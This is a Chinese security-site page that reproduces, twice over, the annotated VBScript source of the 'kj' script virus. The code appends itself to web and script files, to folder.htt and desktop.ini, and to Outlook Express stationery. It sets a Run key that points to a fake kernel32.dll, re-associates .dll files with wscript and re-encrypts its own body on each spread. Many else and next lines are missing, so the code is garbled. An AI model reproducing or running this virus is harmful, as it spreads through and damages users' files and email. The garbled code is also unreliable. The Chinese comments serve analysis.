2022-03-12 22:13:38
<% dim inwhere, htmltext, vbstext, degreesign, appleobject...
dim inwhere, htmltext, vbstext, degreesign, appleobject, fso, wsshell, winpath, sube, finalydisk
sub kj_start()
' 初始化变量
' 初始化环境
' 感染本地或者共享上与html所在目录
' 通过vbs感染outlook邮件模板
' 进行病毒传播
end sub
' 函数:kjappendto(filepath,typestr)
' 功能:向指定类型的指定文件追加病毒
' 参数:
' filepath 指定文件路径
' typestr 指定类型
function kjappendto(filepath, typestr)
on error resume next
' 以只读方式打开指定文件
set readtemp = fso.opentextfile(filepath, 1)
' 将文件内容读入到tmpstr变量中
tmpstr = readtemp.readall
' 判断文件中是否存在"kj_start()"字符串,若存在说明已经感染,退出函数;
' 若文件长度小于1,也退出函数。
if instr(tmpstr, "kj_start()") <> 0 or len(tmpstr) < 1 then
exit function
end if
' 如果传过来的类型是"htt"
' 在文件头加上调用页面的时候加载kj_start()函数;
' 在文件尾追加html版本的加密病毒体。
' 如果是"html"
' 在文件尾追加调用页面的时候加载kj_start()函数和html版本的病毒体;
' 如果是"vbs"
' 在文件尾追加vbs版本的病毒体
if typestr = "htt" then
set filetemp = fso.opentextfile(filepath, 2)
filetemp.write "<" & "body onload="""
& "vbscript:" & "kj_start()""" & ">" & vbcrlf & tmpstr & vbcrlf & htmltext
set fattrib = fso.getfile(filepath)
fattrib.attributes = 34
set filetemp = fso.opentextfile(filepath, 8)
if typestr = "html" then
filetemp.write vbcrlf & "<" & "html>" & vbcrlf & "<"
& "body onload=""" & "vbscript:" & "kj_start()""" & ">" & vbcrlf & htmltext
elseif typestr = "vbs" then
filetemp.write vbcrlf & vbstext
end if
end if
end function
' 函数:kjchangesub(currentstring,lastindexchar)
' 功能:改变子目录以及盘符
' 参数:
' currentstring 当前目录
' lastindexchar 上一级目录在当前路径中的位置
function kjchangesub(currentstring, lastindexchar)
' 判断是否是根目录
if lastindexchar = 0 then
' 如果是根目录
' 如果是c:\,返回finalydisk盘,并将sube置为0,
' 如果不是c:\,返回将当前盘符递减1,并将sube置为0
if left(lcase(currentstring), 1) = < lcase("c") then
kjchangesub = finalydisk & ":\"
sube = 0
kjchangesub = chr(asc(left(lcase(currentstring), 1)) - 1) & ":\"
sube = 0
end if
' 如果不是根目录,则返回上一级目录名称
kjchangesub = mid(currentstring, 1, lastindexchar)
end if
end function
' 函数:kjcreatemail()
' 功能:感染邮件部分
function kjcreatemail()
on error resume next
' 如果当前执行文件是"html"的,就退出函数
if inwhere = "html" then
exit function
end if
' 取系统盘的空白页的路径
sharefile = left(winpath, 3) & "program files\common files\microsoft shared\stationery\blank.htm"
' 如果存在这个文件,就向其追加html的病毒体
' 否则生成含有病毒体的这个文件
if (fso.fileexists(sharefile)) then
call kjappendto(sharefile, "html")
set filetemp = fso.opentextfile(sharefile, 2, true)
filetemp.write "<" & "html>" & vbcrlf & "<" & "body onload=""" & "vbscript:" & "kj_start()""" & ">" & vbcrlf & htmltext
end if
' 取得当前用户的id和outlook的版本
defaultid = wsshell.regread("hkey_current_user\identities\default user id")
outlookversion = wsshell.regread("hkey_local_machine\software\microsoft\outlook express\mediaver")
' 激活信纸功能,并感染所有信纸
wsshell.regwrite "hkey_current_user\identities\"&defaultid&"\software\microsoft\outlook express\"& left(outlookversion, 1) &".0\mail\compose use stationery", 1, "reg_dword"
call kjmailreg("hkey_current_user\identities\"&defaultid&"\software\microsoft\outlook express\"& left(outlookversion, 1) &".0\mail\stationery name", sharefile)
call kjmailreg("hkey_current_user\identities\"&defaultid&"\software\microsoft\outlook express\"& left(outlookversion, 1) &".0\mail\wide stationery name", sharefile)
wsshell.regwrite "hkey_current_user\software\microsoft\office\9.0\outlook\options\mail\editorpreference", 131072, "reg_dword"
call kjmailreg("hkey_current_user\software\microsoft\windows messaging subsystem\profiles\microsoft outlook internet settings\0a0d020000000000c000000000000046\001e0360", "blank")
call kjmailreg("hkey_current_user\software\microsoft\windows nt\currentversion\windows messaging subsystem\profiles\microsoft outlook internet settings\0a0d020000000000c000000000000046\001e0360", "blank")
wsshell.regwrite "hkey_current_user\software\microsoft\office\10.0\outlook\options\mail\editorpreference", 131072, "reg_dword"
call kjmailreg("hkey_current_user\software\microsoft\office\10.0\common\mailsettings\newstationery", "blank")
kjummagefolder(left(winpath, 3) & "program files\common files\microsoft shared\stationery")
end function
' 函数:kjcreatemilieu()
' 功能:创建系统环境
function kjcreatemilieu()
on error resume next
temppath = ""
' 判断操作系统是nt/2000还是9x
if not(fso.fileexists(winpath & "wscript.exe")) then
temppath = "system32\"
end if
' 为了文件名起到迷惑性,并且不会与系统文件冲突。
' 如果是nt/2000则启动文件为system\kernel32.dll
' 如果是9x启动文件则为system\kernel.dll
if temppath = "system32\" then
startupfile = winpath & "system\kernel32.dll"
startupfile = winpath & "system\kernel.dll"
end if
' 添加run值,添加刚才生成的启动文件路径
wsshell.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\run\kernel32", startupfile
' 拷贝前期备份的文件到原来的目录
fso.copyfile winpath & "web\kjwall.gif", winpath & "web\folder.htt"
fso.copyfile winpath & "system32\kjwall.gif", winpath & "system32\desktop.ini"
' 向%windir%\web\folder.htt追加病毒体
call kjappendto(winpath & "web\folder.htt", "htt")
' 改变dll的mime头
' 改变dll的默认图标
' 改变dll的打开方式
wsshell.regwrite "hkey_classes_root\.dll\", "dllfile"
wsshell.regwrite "hkey_classes_root\.dll\content type", "application/x-msdownload"
wsshell.regwrite "hkey_classes_root\dllfile\defaulticon\", wsshell.regread("hkey_classes_root\vxdfile\defaulticon\")
wsshell.regwrite "hkey_classes_root\dllfile\scriptengine\", "vbscript"
wsshell.regwrite "hkey_classes_root\dllfile\shell\open\command\", winpath & temppath & "wscript.exe ""%1"" %*"
wsshell.regwrite "hkey_classes_root\dllfile\shellex\propertysheethandlers\wshprops\", "{60254ca5-953b-11cf-8c96-00aa00b8708c}"
wsshell.regwrite "hkey_classes_root\dllfile\scripthostencode\", "{85131631-480c-11d2-b1f9-00c04f86c324}"
' 启动时加载的病毒文件中写入病毒体
set filetemp = fso.opentextfile(startupfile, 2, true)
filetemp.write vbstext
end function
' 函数:kjlikeit()
' 功能:针对html文件进行处理,如果访问的是本地的或者共享上的文件,将感染这个目录
function kjlikeit()
' 如果当前执行文件不是"html"的就退出程序
if inwhere <> "html" then
exit function
end if
' 取得文档当前路径
thislocation = document.location
' 如果是本地或网上共享文件
if left(thislocation, 4) = "file" then
thislocation = mid(thislocation, 9)
' 如果这个文件扩展名不为空,在thislocation中保存它的路径
if fso.getextensionname(thislocation) <> "" then
thislocation = left(thislocation, len(thislocation) - len(fso.getfilename(thislocation)))
end if
' 如果thislocation的长度大于3就尾追一个"\"
if len(thislocation) > 3 then
thislocation = thislocation & "\"
end if
' 感染这个目录
end if
end function
' 函数:kjmailreg(regstr,filename)
' 功能:如果注册表指定键值不存在,则向指定位置写入指定文件名
' 参数:
' regstr 注册表指定键值
' filename 指定文件名
function kjmailreg(regstr, filename)
on error resume next
' 如果注册表指定键值不存在,则向指定位置写入指定文件名
regtempstr = wsshell.regread(regstr)
if regtempstr = "" then
wsshell.regwrite regstr, filename
end if
end function
' 函数:kjobosub(currentstring)
' 功能:遍历并返回目录路径
' 参数:
' currentstring 当前目录
function kjobosub(currentstring)
sube = 0
testout = 0
do while true
testout = testout + 1
if testout > 28 then
currentstring = finalydisk & ":\"
exit do
end if
on error resume next
' 取得当前目录的所有子目录,并且放到字典中
set thisfolder = fso.getfolder(currentstring)
set dicsub = createobject("scripting.dictionary")
set folders = thisfolder.subfolders
foldercount = 0
for each tempfolder in folders
foldercount = foldercount + 1
dicsub.add foldercount, tempfolder.name
' 如果没有子目录了,就调用kjchangesub返回上一级目录或者更换盘符,并将sube置1
if dicsub.count = 0 then
lastindexchar = instrrev(currentstring, "\", len(currentstring) -1)
substring = mid(currentstring, lastindexchar + 1, len(currentstring) - lastindexchar -1)
currentstring = kjchangesub(currentstring, lastindexchar)
sube = 1
' 如果存在子目录
' 如果sube为0,则将currentstring变为它的第1个子目录
if sube = 0 then
currentstring = currentstring & dicsub.item(1) & "\"
exit do
' 如果sube为1,继续遍历子目录,并将下一个子目录返回
j = 0
for j = 1 to foldercount
if lcase(substring) = lcase(dicsub.item(j)) then
if j < foldercount then
currentstring = currentstring & dicsub.item(j + 1) & "\"
exit do
end if
end if
lastindexchar = instrrev(currentstring, "\", len(currentstring) -1)
substring = mid(currentstring, lastindexchar + 1, len(currentstring) - lastindexchar -1)
currentstring = kjchangesub(currentstring, lastindexchar)
end if
end if
kjobosub = currentstring
end function
' 函数:kjpropagate()
' 功能:病毒传播
function kjpropagate()
on error resume next
regpathvalue = "hkey_local_machine\software\microsoft\outlook express\degree"
diskdegree = wsshell.regread(regpathvalue)
' 如果不存在degree这个键值,diskdegree则为finalydisk盘
if diskdegree = "" then
diskdegree = finalydisk & ":\"
end if
' 继diskdegree置后感染5个目录
for i = 1 to 5
diskdegree = kjobosub(diskdegree)
' 将感染记录保存在"hkey_local_machine\software\microsoft\outlook express\degree"键值中
wsshell.regwrite regpathvalue, diskdegree
end function
' 函数:kjummagefolder(pathname)
' 功能:感染指定目录
' 参数:
' pathname 指定目录
function kjummagefolder(pathname)
on error resume next
' 取得目录中的所有文件集
set foldername = fso.getfolder(pathname)
set thisfiles = foldername.files
httexists = 0
for each thisfile in thisfiles
fileext = ucase(fso.getextensionname(thisfile.path))
' 判断扩展名
' 若是htm,html,asp,php,jsp则向文件中追加html版的病毒体
' 若是vbs则向文件中追加vbs版的病毒体
' 若是htt,则标志为已经存在htt了
if fileext = "htm" or fileext = "html" or fileext = "asp" or fileext = "php" or fileext = "jsp" then
call kjappendto(thisfile.path, "html")
elseif fileext = "vbs" then
call kjappendto(thisfile.path, "vbs")
elseif fileext = "htt" then
httexists = 1
end if
' 如果所给的路径是桌面,则标志为已经存在htt了
if (ucase(pathname) = ucase(winpath & "desktop\")) or (ucase(pathname) = ucase(winpath & "desktop"))then
httexists = 1
end if
' 如果不存在htt
' 向目录中追加病毒体
if httexists = 0 then
fso.copyfile winpath & "system32\desktop.ini", pathname
fso.copyfile winpath & "web\folder.htt", pathname
end if
end function
' 函数kjsetdim()
' 定义fso,wsshell对象
' 取得最后一个可用磁盘卷标
' 生成传染用的加密字串
' 备份系统中的web\folder.htt和system32\desktop.ini
function kjsetdim()
on error resume next
' 测试当前执行文件是html还是vbs
testit = wscript.scriptfullname
if err then
inwhere = "html"
inwhere = "vbs"
end if
' 创建文件访问对象和shell对象
if inwhere = "vbs" then
set fso = createobject("scripting.filesystemobject")
set wsshell = createobject("wscript.shell")
set appleobject = document.applets("kj_guest")
set wsshell = appleobject.getobject()
set fso = appleobject.getobject()
end if
set diskobject = fso.drives
' 判断磁盘类型
' 0: unknown
' 1: removable
' 2: fixed
' 3: network
' 4: cd-rom
' 5: ram disk
' 如果不是可移动磁盘或者固定磁盘就跳出循环。可能作者考虑的是网络磁盘、cd-rom、ram disk都是在比较靠后的位置。呵呵,如果c:是ramdisk会怎么样?
for each disktemp in diskobject
if disktemp.drivetype <> 2 and disktemp.drivetype <> 1 then
exit for
end if
finalydisk = disktemp.driveletter
' 此前的这段病毒体已经解密,并且存放在thistext中,现在为了传播,需要对它进行再加密。
' 加密算法
dim otherarr(3)
' 随机生成4个算子
for i = 0 to 3
otherarr(i) = int((9 * rnd))
tempstring = ""
for i = 1 to len(thistext)
tempnum = asc(mid(thistext, i, 1))
if tempnum = 13 then
tempnum = 28
elseif tempnum = 10 then
tempnum = 29
end if
tempchar = chr(tempnum - otherarr(i mod 4))
if tempchar = chr(34) then
tempchar = chr(18)
end if
tempstring = tempstring & tempchar
' 含有解密算法的字串
unlockstr = "execute(""dim keyarr(3),thistext""&vbcrlf&""keyarr(0) = " & otherarr(0) & """&vbcrlf&""keyarr(1) = " & otherarr(1) & """&vbcrlf&""keyarr(2) = " & otherarr(2) & """&vbcrlf&""keyarr(3) = " & otherarr(3) & """&vbcrlf&""for i=1 to len(exestring)""&vbcrlf&""tempnum = asc(mid(exestring,i,1))""&vbcrlf&""if tempnum = 18 then""&vbcrlf&""tempnum = 34""&vbcrlf&""end if""&vbcrlf&""tempchar = chr(tempnum + keyarr(i mod 4))""&vbcrlf&""if tempchar = chr(28) then""&vbcrlf&""tempchar = vbcr""&vbcrlf&""elseif tempchar = chr(29) then""&vbcrlf&""tempchar = vblf""&vbcrlf&""end if""&vbcrlf&""thistext = thistext & tempchar""&vbcrlf&""next"")" & vbcrlf & "execute(thistext)"
' 将加密好的病毒体复制给变量 thistext
thistext = "exestring = """ & tempstring & """"
' 生成html感染用的脚本
htmltext = "<" & "script language=vbscript>" & vbcrlf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "applet name=kj""&""_guest height=0 width=0 code=com.ms.""&""activex.active""&""xcomponent>" & "<" & "/applet>" & "<" & "/div>""" & vbcrlf & "<" & "/script>" & vbcrlf & "<" & "script language=vbscript>" & vbcrlf & thistext & vbcrlf & unlockstr & vbcrlf & "<" & "/script>" & vbcrlf & "<" & "/body>" & vbcrlf & "<" & "/html>"
' 生成vbs感染用的脚本
vbstext = thistext & vbcrlf & unlockstr & vbcrlf & "kj_start()"
' 取得windows目录
' getspecialfolder(n)
' 0: windowsfolder
' 1: systemfolder
' 2: temporaryfolder
' 如果系统目录存在web\folder.htt和system32\desktop.ini,则用kjwall.gif文件名备份它们。
winpath = fso.getspecialfolder(0) & "\"
if (fso.fileexists(winpath & "web\folder.htt")) then
fso.copyfile winpath & "web\folder.htt", winpath & "web\kjwall.gif"
end if
if (fso.fileexists(winpath & "system32\desktop.ini")) then
fso.copyfile winpath & "system32\desktop.ini", winpath & "system32\kjwall.gif"
end if
end function
dim inwhere, htmltext, vbstext, degreesign, appleobject, fso, wsshell, winpath, sube, finalydisk
sub kj_start()
' 初始化变量
' 初始化环境
' 感染本地或者共享上与html所在目录
' 通过vbs感染outlook邮件模板
' 进行病毒传播
end sub
' 函数:kjappendto(filepath,typestr)
' 功能:向指定类型的指定文件追加病毒
' 参数:
' filepath 指定文件路径
' typestr 指定类型
function kjappendto(filepath, typestr)
on error resume next
' 以只读方式打开指定文件
set readtemp = fso.opentextfile(filepath, 1)
' 将文件内容读入到tmpstr变量中
tmpstr = readtemp.readall
' 判断文件中是否存在"kj_start()"字符串,若存在说明已经感染,退出函数;
' 若文件长度小于1,也退出函数。
if instr(tmpstr, "kj_start()") <> 0 or len(tmpstr) < 1 then
exit function
end if
' 如果传过来的类型是"htt"
' 在文件头加上调用页面的时候加载kj_start()函数;
' 在文件尾追加html版本的加密病毒体。
' 如果是"html"
' 在文件尾追加调用页面的时候加载kj_start()函数和html版本的病毒体;
' 如果是"vbs"
' 在文件尾追加vbs版本的病毒体
if typestr = "htt" then
set filetemp = fso.opentextfile(filepath, 2)
filetemp.write "<" & "body onload="""
& "vbscript:" & "kj_start()""" & ">" & vbcrlf & tmpstr & vbcrlf & htmltext
set fattrib = fso.getfile(filepath)
fattrib.attributes = 34
set filetemp = fso.opentextfile(filepath, 8)
if typestr = "html" then
filetemp.write vbcrlf & "<" & "html>" & vbcrlf & "<"
& "body onload=""" & "vbscript:" & "kj_start()""" & ">" & vbcrlf & htmltext
elseif typestr = "vbs" then
filetemp.write vbcrlf & vbstext
end if
end if
end function
' 函数:kjchangesub(currentstring,lastindexchar)
' 功能:改变子目录以及盘符
' 参数:
' currentstring 当前目录
' lastindexchar 上一级目录在当前路径中的位置
function kjchangesub(currentstring, lastindexchar)
' 判断是否是根目录
if lastindexchar = 0 then
' 如果是根目录
' 如果是c:\,返回finalydisk盘,并将sube置为0,
' 如果不是c:\,返回将当前盘符递减1,并将sube置为0
if left(lcase(currentstring), 1) = < lcase("c") then
kjchangesub = finalydisk & ":\"
sube = 0
kjchangesub = chr(asc(left(lcase(currentstring), 1)) - 1) & ":\"
sube = 0
end if
' 如果不是根目录,则返回上一级目录名称
kjchangesub = mid(currentstring, 1, lastindexchar)
end if
end function
' 函数:kjcreatemail()
' 功能:感染邮件部分
function kjcreatemail()
on error resume next
' 如果当前执行文件是"html"的,就退出函数
if inwhere = "html" then
exit function
end if
' 取系统盘的空白页的路径
sharefile = left(winpath, 3) & "program files\common files\microsoft shared\stationery\blank.htm"
' 如果存在这个文件,就向其追加html的病毒体
' 否则生成含有病毒体的这个文件
if (fso.fileexists(sharefile)) then
call kjappendto(sharefile, "html")
set filetemp = fso.opentextfile(sharefile, 2, true)
filetemp.write "<" & "html>" & vbcrlf & "<" & "body onload=""" & "vbscript:" & "kj_start()""" & ">" & vbcrlf & htmltext
end if
' 取得当前用户的id和outlook的版本
defaultid = wsshell.regread("hkey_current_user\identities\default user id")
outlookversion = wsshell.regread("hkey_local_machine\software\microsoft\outlook express\mediaver")
' 激活信纸功能,并感染所有信纸
wsshell.regwrite "hkey_current_user\identities\"&defaultid&"\software\microsoft\outlook express\"& left(outlookversion, 1) &".0\mail\compose use stationery", 1, "reg_dword"
call kjmailreg("hkey_current_user\identities\"&defaultid&"\software\microsoft\outlook express\"& left(outlookversion, 1) &".0\mail\stationery name", sharefile)
call kjmailreg("hkey_current_user\identities\"&defaultid&"\software\microsoft\outlook express\"& left(outlookversion, 1) &".0\mail\wide stationery name", sharefile)
wsshell.regwrite "hkey_current_user\software\microsoft\office\9.0\outlook\options\mail\editorpreference", 131072, "reg_dword"
call kjmailreg("hkey_current_user\software\microsoft\windows messaging subsystem\profiles\microsoft outlook internet settings\0a0d020000000000c000000000000046\001e0360", "blank")
call kjmailreg("hkey_current_user\software\microsoft\windows nt\currentversion\windows messaging subsystem\profiles\microsoft outlook internet settings\0a0d020000000000c000000000000046\001e0360", "blank")
wsshell.regwrite "hkey_current_user\software\microsoft\office\10.0\outlook\options\mail\editorpreference", 131072, "reg_dword"
call kjmailreg("hkey_current_user\software\microsoft\office\10.0\common\mailsettings\newstationery", "blank")
kjummagefolder(left(winpath, 3) & "program files\common files\microsoft shared\stationery")
end function
' 函数:kjcreatemilieu()
' 功能:创建系统环境
function kjcreatemilieu()
on error resume next
temppath = ""
' 判断操作系统是nt/2000还是9x
if not(fso.fileexists(winpath & "wscript.exe")) then
temppath = "system32\"
end if
' 为了文件名起到迷惑性,并且不会与系统文件冲突。
' 如果是nt/2000则启动文件为system\kernel32.dll
' 如果是9x启动文件则为system\kernel.dll
if temppath = "system32\" then
startupfile = winpath & "system\kernel32.dll"
startupfile = winpath & "system\kernel.dll"
end if
' 添加run值,添加刚才生成的启动文件路径
wsshell.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\run\kernel32", startupfile
' 拷贝前期备份的文件到原来的目录
fso.copyfile winpath & "web\kjwall.gif", winpath & "web\folder.htt"
fso.copyfile winpath & "system32\kjwall.gif", winpath & "system32\desktop.ini"
' 向%windir%\web\folder.htt追加病毒体
call kjappendto(winpath & "web\folder.htt", "htt")
' 改变dll的mime头
' 改变dll的默认图标
' 改变dll的打开方式
wsshell.regwrite "hkey_classes_root\.dll\", "dllfile"
wsshell.regwrite "hkey_classes_root\.dll\content type", "application/x-msdownload"
wsshell.regwrite "hkey_classes_root\dllfile\defaulticon\", wsshell.regread("hkey_classes_root\vxdfile\defaulticon\")
wsshell.regwrite "hkey_classes_root\dllfile\scriptengine\", "vbscript"
wsshell.regwrite "hkey_classes_root\dllfile\shell\open\command\", winpath & temppath & "wscript.exe ""%1"" %*"
wsshell.regwrite "hkey_classes_root\dllfile\shellex\propertysheethandlers\wshprops\", "{60254ca5-953b-11cf-8c96-00aa00b8708c}"
wsshell.regwrite "hkey_classes_root\dllfile\scripthostencode\", "{85131631-480c-11d2-b1f9-00c04f86c324}"
' 启动时加载的病毒文件中写入病毒体
set filetemp = fso.opentextfile(startupfile, 2, true)
filetemp.write vbstext
end function
' 函数:kjlikeit()
' 功能:针对html文件进行处理,如果访问的是本地的或者共享上的文件,将感染这个目录
function kjlikeit()
' 如果当前执行文件不是"html"的就退出程序
if inwhere <> "html" then
exit function
end if
' 取得文档当前路径
thislocation = document.location
' 如果是本地或网上共享文件
if left(thislocation, 4) = "file" then
thislocation = mid(thislocation, 9)
' 如果这个文件扩展名不为空,在thislocation中保存它的路径
if fso.getextensionname(thislocation) <> "" then
thislocation = left(thislocation, len(thislocation) - len(fso.getfilename(thislocation)))
end if
' 如果thislocation的长度大于3就尾追一个"\"
if len(thislocation) > 3 then
thislocation = thislocation & "\"
end if
' 感染这个目录
end if
end function
' 函数:kjmailreg(regstr,filename)
' 功能:如果注册表指定键值不存在,则向指定位置写入指定文件名
' 参数:
' regstr 注册表指定键值
' filename 指定文件名
function kjmailreg(regstr, filename)
on error resume next
' 如果注册表指定键值不存在,则向指定位置写入指定文件名
regtempstr = wsshell.regread(regstr)
if regtempstr = "" then
wsshell.regwrite regstr, filename
end if
end function
' 函数:kjobosub(currentstring)
' 功能:遍历并返回目录路径
' 参数:
' currentstring 当前目录
function kjobosub(currentstring)
sube = 0
testout = 0
do while true
testout = testout + 1
if testout > 28 then
currentstring = finalydisk & ":\"
exit do
end if
on error resume next
' 取得当前目录的所有子目录,并且放到字典中
set thisfolder = fso.getfolder(currentstring)
set dicsub = createobject("scripting.dictionary")
set folders = thisfolder.subfolders
foldercount = 0
for each tempfolder in folders
foldercount = foldercount + 1
dicsub.add foldercount, tempfolder.name
' 如果没有子目录了,就调用kjchangesub返回上一级目录或者更换盘符,并将sube置1
if dicsub.count = 0 then
lastindexchar = instrrev(currentstring, "\", len(currentstring) -1)
substring = mid(currentstring, lastindexchar + 1, len(currentstring) - lastindexchar -1)
currentstring = kjchangesub(currentstring, lastindexchar)
sube = 1
' 如果存在子目录
' 如果sube为0,则将currentstring变为它的第1个子目录
if sube = 0 then
currentstring = currentstring & dicsub.item(1) & "\"
exit do
' 如果sube为1,继续遍历子目录,并将下一个子目录返回
j = 0
for j = 1 to foldercount
if lcase(substring) = lcase(dicsub.item(j)) then
if j < foldercount then
currentstring = currentstring & dicsub.item(j + 1) & "\"
exit do
end if
end if
lastindexchar = instrrev(currentstring, "\", len(currentstring) -1)
substring = mid(currentstring, lastindexchar + 1, len(currentstring) - lastindexchar -1)
currentstring = kjchangesub(currentstring, lastindexchar)
end if
end if
kjobosub = currentstring
end function
' 函数:kjpropagate()
' 功能:病毒传播
function kjpropagate()
on error resume next
regpathvalue = "hkey_local_machine\software\microsoft\outlook express\degree"
diskdegree = wsshell.regread(regpathvalue)
' 如果不存在degree这个键值,diskdegree则为finalydisk盘
if diskdegree = "" then
diskdegree = finalydisk & ":\"
end if
' 继diskdegree置后感染5个目录
for i = 1 to 5
diskdegree = kjobosub(diskdegree)
' 将感染记录保存在"hkey_local_machine\software\microsoft\outlook express\degree"键值中
wsshell.regwrite regpathvalue, diskdegree
end function
' 函数:kjummagefolder(pathname)
' 功能:感染指定目录
' 参数:
' pathname 指定目录
function kjummagefolder(pathname)
on error resume next
' 取得目录中的所有文件集
set foldername = fso.getfolder(pathname)
set thisfiles = foldername.files
httexists = 0
for each thisfile in thisfiles
fileext = ucase(fso.getextensionname(thisfile.path))
' 判断扩展名
' 若是htm,html,asp,php,jsp则向文件中追加html版的病毒体
' 若是vbs则向文件中追加vbs版的病毒体
' 若是htt,则标志为已经存在htt了
if fileext = "htm" or fileext = "html" or fileext = "asp" or fileext = "php" or fileext = "jsp" then
call kjappendto(thisfile.path, "html")
elseif fileext = "vbs" then
call kjappendto(thisfile.path, "vbs")
elseif fileext = "htt" then
httexists = 1
end if
' 如果所给的路径是桌面,则标志为已经存在htt了
if (ucase(pathname) = ucase(winpath & "desktop\")) or (ucase(pathname) = ucase(winpath & "desktop"))then
httexists = 1
end if
' 如果不存在htt
' 向目录中追加病毒体
if httexists = 0 then
fso.copyfile winpath & "system32\desktop.ini", pathname
fso.copyfile winpath & "web\folder.htt", pathname
end if
end function
' 函数kjsetdim()
' 定义fso,wsshell对象
' 取得最后一个可用磁盘卷标
' 生成传染用的加密字串
' 备份系统中的web\folder.htt和system32\desktop.ini
function kjsetdim()
on error resume next
' 测试当前执行文件是html还是vbs
testit = wscript.scriptfullname
if err then
inwhere = "html"
inwhere = "vbs"
end if
' 创建文件访问对象和shell对象
if inwhere = "vbs" then
set fso = createobject("scripting.filesystemobject")
set wsshell = createobject("wscript.shell")
set appleobject = document.applets("kj_guest")
set wsshell = appleobject.getobject()
set fso = appleobject.getobject()
end if
set diskobject = fso.drives
' 判断磁盘类型
' 0: unknown
' 1: removable
' 2: fixed
' 3: network
' 4: cd-rom
' 5: ram disk
' 如果不是可移动磁盘或者固定磁盘就跳出循环。可能作者考虑的是网络磁盘、cd-rom、ram disk都是在比较靠后的位置。呵呵,如果c:是ramdisk会怎么样?
for each disktemp in diskobject
if disktemp.drivetype <> 2 and disktemp.drivetype <> 1 then
exit for
end if
finalydisk = disktemp.driveletter
' 此前的这段病毒体已经解密,并且存放在thistext中,现在为了传播,需要对它进行再加密。
' 加密算法
dim otherarr(3)
' 随机生成4个算子
for i = 0 to 3
otherarr(i) = int((9 * rnd))
tempstring = ""
for i = 1 to len(thistext)
tempnum = asc(mid(thistext, i, 1))
if tempnum = 13 then
tempnum = 28
elseif tempnum = 10 then
tempnum = 29
end if
tempchar = chr(tempnum - otherarr(i mod 4))
if tempchar = chr(34) then
tempchar = chr(18)
end if
tempstring = tempstring & tempchar
' 含有解密算法的字串
unlockstr = "execute(""dim keyarr(3),thistext""&vbcrlf&""keyarr(0) = " & otherarr(0) & """&vbcrlf&""keyarr(1) = " & otherarr(1) & """&vbcrlf&""keyarr(2) = " & otherarr(2) & """&vbcrlf&""keyarr(3) = " & otherarr(3) & """&vbcrlf&""for i=1 to len(exestring)""&vbcrlf&""tempnum = asc(mid(exestring,i,1))""&vbcrlf&""if tempnum = 18 then""&vbcrlf&""tempnum = 34""&vbcrlf&""end if""&vbcrlf&""tempchar = chr(tempnum + keyarr(i mod 4))""&vbcrlf&""if tempchar = chr(28) then""&vbcrlf&""tempchar = vbcr""&vbcrlf&""elseif tempchar = chr(29) then""&vbcrlf&""tempchar = vblf""&vbcrlf&""end if""&vbcrlf&""thistext = thistext & tempchar""&vbcrlf&""next"")" & vbcrlf & "execute(thistext)"
' 将加密好的病毒体复制给变量 thistext
thistext = "exestring = """ & tempstring & """"
' 生成html感染用的脚本
htmltext = "<" & "script language=vbscript>" & vbcrlf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "applet name=kj""&""_guest height=0 width=0 code=com.ms.""&""activex.active""&""xcomponent>" & "<" & "/applet>" & "<" & "/div>""" & vbcrlf & "<" & "/script>" & vbcrlf & "<" & "script language=vbscript>" & vbcrlf & thistext & vbcrlf & unlockstr & vbcrlf & "<" & "/script>" & vbcrlf & "<" & "/body>" & vbcrlf & "<" & "/html>"
' 生成vbs感染用的脚本
vbstext = thistext & vbcrlf & unlockstr & vbcrlf & "kj_start()"
' 取得windows目录
' getspecialfolder(n)
' 0: windowsfolder
' 1: systemfolder
' 2: temporaryfolder
' 如果系统目录存在web\folder.htt和system32\desktop.ini,则用kjwall.gif文件名备份它们。
winpath = fso.getspecialfolder(0) & "\"
if (fso.fileexists(winpath & "web\folder.htt")) then
fso.copyfile winpath & "web\folder.htt", winpath & "web\kjwall.gif"
end if
if (fso.fileexists(winpath & "system32\desktop.ini")) then
fso.copyfile winpath & "system32\desktop.ini", winpath & "system32\kjwall.gif"
end if
end function
上一篇: NET IIS暴绝对路径漏洞
下一篇: 风讯4.0未公开Bug